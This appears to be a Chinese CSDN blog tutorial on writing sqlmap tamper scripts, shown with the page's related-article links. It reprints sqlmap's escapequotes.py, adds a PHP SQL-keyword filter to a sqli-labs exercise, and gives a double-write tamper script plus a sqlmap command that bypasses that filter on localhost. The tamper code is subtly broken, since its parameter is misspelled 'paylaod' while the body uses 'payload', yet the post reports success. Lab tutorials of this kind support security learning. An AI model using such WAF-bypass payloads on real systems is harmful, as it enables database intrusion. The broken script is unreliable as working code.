tamper编写

最新推荐文章于 2024-05-16 15:30:42 发布
最新推荐文章于 2024-05-16 15:30:42 发布
阅读量395 收藏 4
点赞数 7
文章标签: java 前端 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75317918/article/details/135065838
版权

借鉴

 sqlmap之tamper脚本编写_sqlmap tamper编写-CSDN博客

先看一个tamper的例子

栗子

escapequotes.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Slash escape single and double quotes (e.g. ' -> \')

    >>> tamper('1" AND SLEEP(5)#')
    '1\\\\" AND SLEEP(5)#'
    """

    return payload.replace("'", "\\'").replace('"', '\\"')

脚本结构为priority变量定义和dependencies、tamper函数定义。

priority定义脚本的优先级,用于有多个tamper脚本的情况。如果你加载多个tamper,谁的优先级高,谁被优先使用。

(优先级共有七个,分别为;LOWEST、LOWER、LOW、NORMAL、HIGH、HIGHER、HIGHEST)

        
dependencies函数声明该脚本适用/不适用的范围,可以为空。
tamper是主要的函数,接受的参数为payload和**kwargs。返回值为替换后的payload。

这里把引号替换为了\\'。

实践

在sqli_lab1的基础上,我们增加过滤函数

function sqlwaf( $str ) {
	$str = str_ireplace( "and", "", $str );
	$str = str_ireplace( "or", "", $str );
	$str = str_ireplace( "union", "", $str );
	$str = str_ireplace( "select", "", $str );
	$str = str_ireplace( "sleep", "", $str );
	$str = str_ireplace( "group", "", $str );
	$str = str_ireplace( "extractvalue", "", $str );
	$str = str_ireplace( "updatexml", "", $str );
	$str = str_ireplace( "PROCEDURE", "", $str );
	
	return $str;
}

此时我们知道需要用双写来绕过

我们先手动试一下

直接order会报错

双写绕过成功

不加tamper,我们直接尝试一下

不成功        

 下面我们编写tamper(双写绕过)

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(paylaod,**kwargs):
    if payload:
        result = payload.replace("OR","oorr").replace("AND", "aandnd").replace("UNION", "ununionion").replace("SELECT", "seleselectct").replace("PROCEDURE", "PROCEPROCEDUREURE").replace("SLEEP", "slesleepep").replace("GROUP", "grogroupup").replace("EXTRACTVALUE", "extractvextractvaluealue").replace("UPDATEXML", "updatupdatexmlexml")
        return result

 sqlmap.py -u "http://127.0.0.1/sqlI/Less-1/?id=1" --tamper=tamper.py --batch

成功

木…
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
1、Sqlmap Tamper脚本编写介绍-01
09-15
1、Sqlmap Tamper脚本编写介绍-01
Sqlmap Tamper编写
qq_41741127的博客
10-06 1851
Sqlmap Tamper编写 Sqlmap Tamper是sqlmap可以调用的脚本,已进行对payload的修改,如:双写、替换空格、编码等。 sqlmap可以使用--tamper调用,编写使用Python。 from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST def dependencies(): pass def tamper(payload, **kwargs): return payload
WEB攻防-注入工具&SQLMAP&Tamper编写&指纹修改&高权限操作&目录架构
siu~
09-06 211
1、注入工具-SQLMAP-常规猜解&字典配置 2、注入工具-SQLMAP-权限操作&文件命令 3、注入工具-SQLMAP-Tamper&使用&开发 4、注入工具-SQLMAP-调试指纹&风险等级
sqlmap之tamper脚本编写
yy
07-26 8621
目录 前言 tamper脚本实战 前言 sqlmap是一个自动化的SQL注入工具,而tamper则是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf。 为了说明tamper的结构,让我们从一个最简单的例子开始 # sqlmap/tamper/escapequotes.py from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST def dependencies():
Sqlmap Tamper 编写/改写 学习
Goodric的博客
04-26 1730
sqlmap的--tamper参数可以引入用户自定义的脚本修改注入时的payload ,达到sql注入时对一些敏感字符的一些绕过
SQLMAP插件tamper编写与使用
永远是少年
08-25 700
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQLMAP插件tamper编写与使用。 一、SQLMAP插件tamper简介 二、SQLMAP插件tamper使用 三、SQLMAP插件tamper编写
SQLmap Tamper编写方法(笔记)
qq_41320827的博客
02-20 756
0x00 $ python sqlmap.py --list-tampers #查看内置tamper sqlmap提供了很多的内置tamper,其包含了常见数据库的sql注入绕过,可在特定条件下进行SQL注入绕过防御。 0x01 --tamper=xxx.py 使用时加上tamper选项即可。 0x02 根据具体情况编写自己的tamper脚本 依据自己当前分析或fuzz出的原理 照猫画虎...
sqlmap tamper编写
weixin_30867015的博客
08-23 118
#!/usr/bin/env python """ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.enums import PRIORITY __prior...
tamper脚本&mysql爆破脚本编写
路虽远,行将至。事虽难,做必达。
03-14 974
tamper概念: sqlmap的--tamper参数可以引入用户自定义的脚本来修改注入时的payload,由此可以使用tamper来绕过waf,替换被过滤的关键字等。 基本操作: 查看脚本:python sqlmap.py --list-tampers 使用脚本:python sqlmap.py --tamper=script_name ...
Tampermonkey脚本编写
SquareBlock的博客
02-04 5452
Tampermonkey脚本编写前言一、Tampermonkey是什么?二、特色1.方便的脚本管理2.脚本概览3.设置多样性4.脚本自动更新5.安全6.兼容性7.Chrome 同步8.CodeMirror 编辑器9.JSHint 语法检查10.快速开发三、下载1.Tampermonkey Stable2.Tampermonkey Beta四、语法五、用户脚本Userscript.Zone SearchGitHub/GistGreasyForkOpenUserJS 前言 越来越多的人使用脚本,而目前最火的C
userscripts:Tampermonkey 的自定义用户脚本
05-30
Tampermonkey / Greasemonkey 用户脚本 用户脚本可用于在浏览器中使用Javascript修改网站,使其符合您的喜好。 这无需安装外部扩展即可工作,您可以轻松检查代码。 这是我建造的一些。 如何安装 获取或 。 点击你想...
实战绕过双重waf(玄武盾+程序自身过滤)结合编写sqlmap的tamper获取数据.pdf
03-24
实战绕过双重waf 玄武盾+程序自身过滤 结合编写sqlmap的tamper获取数据 文档来自互联网仅做学习使用,请勿使用文档相关内容进行违法犯罪活动。
sqlmapTamper:测试过程中需要绕过各种waf或者全局的过滤机制,因此编写各种适合的tamper
06-04
sqlmapTamper测试过程中需要绕过各种waf或者全局的过滤机制,因此编写各种适合的tamper。initialunicodeencode.py 用于将首字母unicode编码,遇到WebKnight防火墙时使用过。thinkphp0day.py 用于Thinkphp 3.0-3.3 中...
kthb-DiVA-tampermonkey
05-08
基本上,这就是插件和专门为KTHB编写的代码。 DiVA猴子的最终目的是最大程度地减少点击次数,不同窗口的数量和更改,手动输入数据。 简而言之,可以节省时间和金钱。 大部分代码可以轻松地适应其他DiVA库的需求。 ...
jar包增量更新分析
junlaiyan的专栏
05-16 251
借助jdeps分析出jar包的增量文件
java实现拼图小游戏
monkey108的博客
05-16 614
本文主要提供用java实现的拼图小游戏源代码。
命令执行漏洞(二)
XLbb的博客
05-15 899
POST方法,S2-045-bypass-2漏洞存在!,程序更改为S2-045-bypass-2漏洞测试模式, 响应码: 200。POST方法,S2-046-bypass漏洞存在!POST方法,S2-045-bypass漏洞存在!POST方法,S2-046-1漏洞存在!POST方法,S2-046-2漏洞存在!POST方法,S2-046-3漏洞存在!POST方法,S2-045-1漏洞存在!POST方法,S2-045-3漏洞存在!POST方法,S2-045-2漏洞存在!POST方法,S2-045-4漏洞存在!
c【语言】了解指针,爱上指针(1)
最新发布
yzqy_的博客
05-16 899
在计算机中,数据是存储在内存中的,cpu从内存中读取数据,为了方便读取数据,内存又被划分为了一个个的内存单元,一个内存单元的大小就是一字节,一字节等于8bit位,我们给内存进行编号,这个编号就是地址,在c语言中给这个地址起了个名字。是的,亲爱的读者你肯定发现了,&a、p和pc输出的地址是一样的,但&a+1与p+1输出的地址是一样的00EFF940,一次都跳过了4字节,而pc+1输出的却是00EFF93D,一次只跳过一个字节。但是硬件与硬件之间是相互独立的,这该如何实现数据传输呢?”答案当然是否定的。
tampermonkey 编写
09-19
下面是一个简单的示例,展示了如何使用 Tampermonkey 编写一个脚本: ```javascript // ==UserScript== // @name 示例脚本 // @namespace http://tampermonkey.net/ // @version 1.0 // @description 在控制台打印 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值